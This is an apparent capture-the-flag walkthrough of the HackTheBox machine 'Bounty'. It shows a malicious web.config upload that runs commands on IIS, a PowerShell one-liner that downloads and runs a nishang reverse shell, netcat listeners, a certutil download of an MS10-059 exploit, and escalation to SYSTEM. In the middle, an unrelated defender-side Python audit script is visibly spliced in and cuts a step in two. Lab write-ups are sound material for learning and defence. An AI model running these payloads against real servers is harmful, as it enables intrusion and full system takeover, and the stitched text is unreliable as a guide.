hackthebox bounty walkthrough

Starting with nmap

# nmap -sC -sV -oA bounty
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-19 10:09 EDT
Nmap scan report for
Host is up (0.17s latency).
Not shown: 999 filtered ports
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.46 seconds

Port 80 shows just a picture named merlin.jpg. Possibly a user on the box.

hackthebox – bounty – merlin

Running gobuster with the .aspx extension, we get two things of interest.

First, transfer.aspx, where we can upload files, and second, UploadedFiles, where we can access the files we uploaded.

hackthebox – bounty – transfer

Enumerating the upload form, we find that only image files and .config files are accepted. Searching Google for exploitation using a .config file, we find this link. It demonstrates how a web.config file can be used to run commands.

The content of web.config is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
<remove fileExtension=".config" />
<remove segment="web.config" />
Server.CreateObject("WSCRIPT.SHELL").exec("cmd.exe /c PAYLOAD ")

We have to replace PAYLOAD with the command that we want to run. We use PowerShell to get a shell here. Replace PAYLOAD with the following command:

powershell -c iex(New-Object Net.WebClient).DownloadString('');

where the elided address is the local IP address and shell.ps1 is a copy of Invoke-PowerShellTcp.ps1, which can be found in the nishang GitHub repo.

Set up a web server:
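From the defender's side, the weakness exploited above is twofold: the upload form accepts .config files at all, and nothing inspects what lands in the upload directory. The following script is an added example written for this walkthrough, not code from the walkthrough or from the HackTheBox box. It implements an upload allowlist that rejects .config and reserved IIS names, and an audit of a .config file's text that flags the three things the malicious web.config above relies on: a handler that maps a non-code extension to a script engine, request-filtering rules that unblock .config and web.config, and inline ASP markup. The expected-extension table, the allowlist and both sample configs are constructed assumptions for the example; the sample "malicious" config mirrors the structure shown above with a harmless Response.Write in place of the command.

```python
"""Defender-side audit for the web.config upload abuse shown in this walkthrough.

Added example (not the walkthrough's code). Two checks a blue team cares about:
  1. the upload allowlist: a .config must never be an accepted upload, and
  2. the content of any .config that did reach disk: handler registrations that
     hand a non-code extension to a script engine, request-filtering rules that
     unblock .config / web.config, and inline ASP markup.
"""
import os
import re
import xml.etree.ElementTree as ET

# Assumption (illustrative, not an exhaustive IIS list): which request-path
# extensions each ISAPI script processor is expected to serve.
EXPECTED_EXTENSIONS = {
    "asp.dll": {".asp"},
    "aspnet_isapi.dll": {".aspx", ".ashx", ".asmx", ".axd", ".svc"},
}

# Constructed allowlist for an image-upload form: no .config, no script extensions.
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Server-side ASP block, wherever it sits (an XML comment does not hide it).
ASP_BLOCK_RE = re.compile(r"<%.*?%>", re.DOTALL)


def is_allowed_upload(filename: str) -> bool:
    """Allowlist check: only image extensions, never the reserved web.config name."""
    base = os.path.basename(filename).lower()
    if base == "web.config":
        return False
    _, ext = os.path.splitext(base)
    return ext in IMAGE_EXTENSIONS


def _basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def audit_config_text(text: str) -> list[str]:
    """Return a list of findings for the text of a .config file (empty = clean)."""
    findings = []
    if ASP_BLOCK_RE.search(text):
        findings.append("inline ASP script block (<% ... %>) in a .config file")
    # ASP markup placed after the XML root would break parsing; strip it first.
    xml_text = ASP_BLOCK_RE.sub("", text)
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        findings.append(f"not well-formed XML: {exc}")
        return findings
    # Handler registrations that route requests into a script engine.
    for handlers in root.iter("handlers"):
        for add in handlers.findall("add"):
            proc = _basename(add.get("scriptProcessor", ""))
            _, ext = os.path.splitext(add.get("path", "").lower())
            if not proc:
                continue  # managed handler without an ISAPI processor
            if proc not in EXPECTED_EXTENSIONS:
                findings.append(f"handler {add.get('name')!r} uses unexpected script processor {proc}")
            elif ext not in EXPECTED_EXTENSIONS[proc]:
                findings.append(f"handler {add.get('name')!r} maps {add.get('path')!r} to {proc}")
    # Request-filtering changes that make .config files reachable over HTTP.
    for fe in root.iter("fileExtensions"):
        for rem in fe.findall("remove"):
            if rem.get("fileExtension", "").lower() == ".config":
                findings.append("request filtering: .config removed from blocked file extensions")
    for hs in root.iter("hiddenSegments"):
        for rem in hs.findall("remove"):
            if rem.get("segment", "").lower() == "web.config":
                findings.append("request filtering: web.config removed from hidden segments")
    return findings


# Constructed sample mirroring the structure of the malicious web.config above,
# with a harmless ASP body in place of the command.
MALICIOUS_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified"
           requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- <% Response.Write("probe") %> -->
"""

# Constructed benign sample: the usual .aspx mapping, nothing else.
BENIGN_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <add name="aspx_isapi" path="*.aspx" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" />
    </handlers>
  </system.webServer>
</configuration>
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, audit_config_text(sample) or "clean")
    print("web.config allowed as upload:", is_allowed_upload("web.config"))
```

Run against the two constructed samples, the malicious one yields four findings (the ASP block, the *.config-to-asp.dll handler, and the two request-filtering removals) while the benign one yields none. In practice the allowlist check belongs in the upload handler and the audit in a scheduled job or file-integrity monitor over every user-writable web directory; the cleanest mitigation is still to keep upload directories outside the web root or to deny per-directory configuration overrides for them.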

# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ...

Then upload the web.config file and access it through the browser; you will get a shell.

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49160
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami

For user.txt, you need to run the following command to clear the hidden and system attributes:

C:\Users\merlin\Desktop>attrib *.* -h -s /s /d

For privilege escalation, we first get the system information by running the systeminfo command and then use Windows Exploit Suggester.

# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --database /opt/Windows-Exploit-Suggester/2019-07-17-mssb.xls  --systeminfo ~/htb/bounty/sysinfo.txt 

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

We use MS10-059. Download the binary from here. Put it in the same directory we are serving over HTTP. I have renamed it to ms59.exe. Download it on the remote machine using certutil.

PS C:\users\public> certutil.exe -urlcache -split -f "" ms59.exe

****  Online  ****
  000000  ...
CertUtil: -URLCache command completed successfully.
PS C:\users\public> dir

    Directory: C:\users\public

Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d-r--         7/14/2009   8:06 AM            Documents                         
d-r--         7/14/2009   7:57 AM            Downloads                         
d-r--         7/14/2009   7:57 AM            Music                             
d-r--         7/14/2009   7:57 AM            Pictures                          
d-r--         7/14/2009   7:57 AM            Videos                            
-a---         7/20/2019   6:46 AM     784384 ms59.exe                          

Run the exe to get a shell. Do not forget to listen on the port first.

# nc -lvnp 5555
PS C:\users\public> ./ms59.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
PS C:\users\public> ./ms59.exe 5555

At last, we are SYSTEM:

# nc -lvnp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system
